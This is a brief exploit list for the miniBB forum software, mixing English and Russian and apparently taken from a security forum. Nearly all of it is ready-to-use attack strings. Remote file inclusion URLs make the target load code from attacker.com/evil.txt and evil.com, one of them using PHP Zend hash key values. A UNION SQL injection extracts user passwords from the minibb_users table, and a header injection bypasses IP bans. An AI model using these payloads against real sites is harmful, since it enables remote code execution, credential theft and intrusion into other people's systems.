miniBB <=1.5a

Type: Remote File Include Vulnerabilities
Bug: com_minibb.php & index.php
Author: Ahmad Maulana a.k.a Matdhule

Эксплоит :
http://[target]/[path]/components/com_minibb.php?absolute_path=http://attacker.com/evil.txt?
http://[target]/[path]/components/minibb/index.php?absolute_path= http://attacker.com/evil.txt?




miniBB <= 2.x

Удаленный/локальный инклуд.

PHP<= 4.4.3, 5.1.4 Zend_Hash_Del_Key_Or_Index

includeHeader

Value:

PHP 4 -269001946
PHP 5 -834358190

Exploit: http://server/miniBB/index.php?includeHeader=http://www.evil.com/?&-269001946=1&-834358190=1


[miniBB unknown]

SQL-inj

Exploit: http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select% 201,2,user_password%20from%20minibb_users/*


miniBB 2.x

Раскрытие префикса базы, обход бана по айпи.

PHP ip2long() function circumvention

Exploit: X-FOWARDED-FOR: 1[CHR(9)]'[SQL CODE]